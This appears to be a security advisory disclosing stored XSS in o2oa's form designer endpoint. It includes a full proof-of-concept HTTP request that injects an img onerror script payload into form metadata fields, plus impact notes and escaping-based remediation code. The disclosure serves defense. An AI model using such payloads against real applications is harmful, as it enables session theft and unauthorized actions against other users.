Stored XSS in /x_processplatform_assemble_designer/jaxrs/form in o2oa ≤ 10.0-410-g3d5e0d2
Summary
In o2oa versions up to 10.0-410-g3d5e0d2, the endpoint /x_processplatform_assemble_designer/jaxrs/form is vulnerable to stored cross-site scripting (XSS). User-supplied form metadata (the name, alias, description and category fields shown in the PoC below) is stored without sanitization and later rendered in the application without output encoding, so a script payload placed in those fields executes persistently in the browser of any user who views the stored form.
Exploitation
POC:
POST /x_processplatform_assemble_designer/jaxrs/form?v=develop-10.0-410-3d5e0d2&mehur4z2 HTTP/1.1
Host: localhost
Content-Type: application/json; charset=UTF-8
Authorization: Wrr7kmtfAdF_VIsbJE2G29FepzPqRDNPvPAekU6E6zc
Sec-Fetch-Dest: empty
Referer: http://localhost/x_desktop/index.html
sec-ch-ua-platform: "Windows"
Sec-Fetch-Mode: cors
Origin: http://localhost
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/json,*/*
Cookie: x-token=Wrr7kmtfAdF_VIsbJE2G29FepzPqRDNPvPAekU6E6zc
Content-Length: 4926
{
"id": "a9fa20e8-1bbf-43b1-9b24-706182c95ad4",
"name": "\"><img src=1 onerror=alert(1)>",
"alias": "\"><img src=1 onerror=alert(1)>",
"hasMobile": false,
"description": "\"><img src=1 onerror=alert(1)>",
"application": "9fce716a-d406-40b8-9b79-7b636bd12cda",
"category": "\"><img src=1 onerror=alert(1)>",
"formFieldList": [],
"relatedScriptMap": null,
"relatedFormList": [],
"mobileRelatedScriptMap": null,
"mobileRelatedFormList": [],
"data": "{\\\"json\\\":{\\\"id\\\":\\\"a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\",\\\"name\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"type\\\":\\\"Form\\\",\\\"mode\\\":\\\"PC\\\",\\\"description\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"application\\\":\\\"9fce716a-d406-40b8-9b79-7b636bd12cda\\\",\\\"applicationName\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"styles\\\":{\\\"background-color\\\":\\\"#f0f0f0\\\"},\\\"cssLinks\\\":[],\\\"scriptSrc\\\":[],\\\"submitScript\\\":{\\\"code\\\":\\\"layout.mobile ? this.popupProcessorMobile() : this.popupProcessor();\\\"},\\\"formStyleType\\\":\\\"blue-simple\\\",\\\"pid\\\":\\\"PCa9fa20e8-1bbf-43b1-9b24-706182c95ad4a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\",\\\"isReadonly\\\":false,\\\"languageType\\\":\\\"none\\\",\\\"isQuickSelect\\\":\\\"yes\\\",\\\"submitFormType\\\":\\\"default\\\",\\\"isHandwriting\\\":\\\"yes\\\",\\\"isPrompt\\\":true,\\\"promptPosition\\\":\\\"center\\\",\\\"afterProcessAction\\\":\\\"close\\\",\\\"category\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"subformList\\\":[],\\\"$version\\\":\\\"5.2\\\"},\\\"html\\\":\\\"<div mwftype=\\\\\\\"form\\\\\\\" id=\\\\\\\"a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\\\\\" class=\\\\\\\"cssa9fa20e81bbf43b19b24706182c95ad4\\\\\\\" style=\\\\\\\"\\\\\\\"></div>\\\",\\\"isNewForm\\\":true}",
"mobileData": "{\\\"json\\\":{\\\"id\\\":\\\"a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\",\\\"name\\\":\\\"新建表单\\\",\\\"type\\\":\\\"Form\\\",\\\"mode\\\":\\\"Mobile\\\",\\\"description\\\":\\\"\\\",\\\"application\\\":\\\"\\\",\\\"applicationName\\\":\\\"\\\",\\\"styles\\\":{},\\\"properties\\\":{},\\\"cssLinks\\\":[],\\\"scriptSrc\\\":[],\\\"jsheader\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"submitScript\\\":{\\\"code\\\":\\\"layout.mobile ? this.popupProcessorMobile() : this.popupProcessor();\\\",\\\"html\\\":\\\"\\\"},\\\"events\\\":{\\\"queryLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"postLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeSave\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterSave\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeClose\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeProcess\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeProcessWork\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterProcess\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeReset\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterReset\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeRetract\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterRetract\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeReroute\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterReroute\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeDelete\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterDelete\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeModulesLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterModulesLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"help\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"load\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"unload\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"click\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"dblclick\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"keydown\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"keypress\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"keyup\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mousedown\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mousemove\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mouseout\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mouseover\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mouseup\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"focus\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"blur\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"submit\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"reset\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"}},\\\"moduleList\\\":{},\\\"fieldList\\\":{}},\\\"html\\\":\\\"<div MWFType=\\\\\\\"form\\\\\\\" id=\\\\\\\"\\\\\\\"></div>\\\",\\\"id\\\":\\\"\\\",\\\"isNewForm\\\":true}"
}

When the stored form (or any page that displays its name, alias, description or category) is later viewed in the application, the payload executes, confirming stored XSS.
Impact
- Persistent JavaScript execution in the browser of every user who views the stored form
- Possible theft of session tokens or other sensitive user data (the x-token value seen in the PoC request is the session credential; whether script can read the cookie directly depends on its HttpOnly flag, but injected script can in any case issue authenticated requests to the JAX-RS endpoints from the victim's origin)
- Unauthorized actions performed on behalf of authenticated users
Remediation
Validate the form metadata fields (name, alias, description, category) on the server before storage, and apply contextual output encoding (HTML entity encoding for element text, attribute encoding for quoted attribute values) wherever the designer or the desktop UI renders them. Note that o2oa form definitions legitimately contain HTML and script (the data field in the PoC carries html and submitScript members), so the fix is encoding of the metadata fields at every render point rather than blanket stripping of the whole form body. Where the application's own inline scripting allows it, a Content-Security-Policy that disallows inline event handlers is a useful defense in depth against payloads of the onerror= kind used here.
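As an added illustration of the encoding fix (example code written for this note, not o2oa's own rendering code; the renderFormCard* function names and the card template are assumptions), the block below renders the PoC's form metadata first the vulnerable way and then with contextual output encoding, using the payload from the request above as constructed sample input:

```javascript
// Added example, not o2oa project code. Shows why string-concatenated HTML
// lets the stored payload execute, and how contextual output encoding of the
// form metadata fields (name, alias, description, category) neutralizes it.
// The template shape and function names below are assumptions for illustration.

// Constructed sample input: the metadata values from the PoC request above.
const SAMPLE_FORM = {
  id: "a9fa20e8-1bbf-43b1-9b24-706182c95ad4",
  name: '"><img src=1 onerror=alert(1)>',
  alias: '"><img src=1 onerror=alert(1)>',
  description: '"><img src=1 onerror=alert(1)>',
  category: '"><img src=1 onerror=alert(1)>',
};

// Vulnerable pattern: untrusted values are concatenated straight into markup.
// The leading `"` in alias closes the title attribute, the `>` closes the tag,
// and the remainder becomes a live <img onerror=...> element.
function renderFormCardUnsafe(form) {
  return `<div class="form-card" title="${form.alias}">` +
         `<span class="name">${form.name}</span>` +
         `<span class="category">${form.category}</span>` +
         `<p>${form.description}</p></div>`;
}

// HTML entity encoding that is safe for element text and for values placed
// inside double- or single-quoted attributes. `&` is encoded first so that
// already-encoded entities are not double-decoded; `"` and `'` are what stop
// an attribute breakout like the one in the PoC.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened pattern: every untrusted value is encoded for the context it lands
// in, and attribute values are always quoted so the encoded `"` stays inert.
function renderFormCardSafe(form) {
  const e = escapeHtml;
  return `<div class="form-card" title="${e(form.alias)}">` +
         `<span class="name">${e(form.name)}</span>` +
         `<span class="category">${e(form.category)}</span>` +
         `<p>${e(form.description)}</p></div>`;
}

// Demonstration check only: does the rendered markup contain an <img> start
// tag that the template never wrote? After encoding, the payload survives only
// as the literal text `&lt;img ... onerror=alert(1)&gt;`, which the HTML
// parser treats as character data, not as an element.
function isInjected(html) {
  return /<\s*img\b/i.test(html);
}

// When writing into a live DOM, prefer DOM APIs over HTML strings, because they
// never parse the value as markup, so there is no encoding step to forget:
//   span.textContent = form.name;          // text context
//   div.setAttribute("title", form.alias); // attribute context
```

Running renderFormCardUnsafe(SAMPLE_FORM) yields markup containing a real `<img src=1 onerror=alert(1)>` element, which is what a victim's browser executes; renderFormCardSafe(SAMPLE_FORM) yields `title="&quot;&gt;&lt;img src=1 onerror=alert(1)&gt;"`, which displays the attacker's string verbatim but runs nothing.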